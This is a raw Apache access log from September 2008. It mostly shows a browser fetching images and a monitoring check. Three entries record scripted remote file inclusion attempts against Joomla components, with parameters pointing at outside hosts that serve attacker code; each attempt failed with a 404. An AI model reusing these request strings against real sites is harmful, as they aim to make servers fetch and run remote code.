222.148.130.115 - - [10/Sep/2008:00:21:51 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
222.148.130.115 - - [10/Sep/2008:00:21:52 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
222.148.130.115 - - [10/Sep/2008:00:21:52 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
81.31.149.109 - - [10/Sep/2008:00:21:55 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 248 "-" "libwww-perl/5.808"
81.31.149.109 - - [10/Sep/2008:00:21:55 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
213.91.246.64 - - [10/Sep/2008:00:23:23 -0400] "GET /logs/access_log.Q108082100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:00:23:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
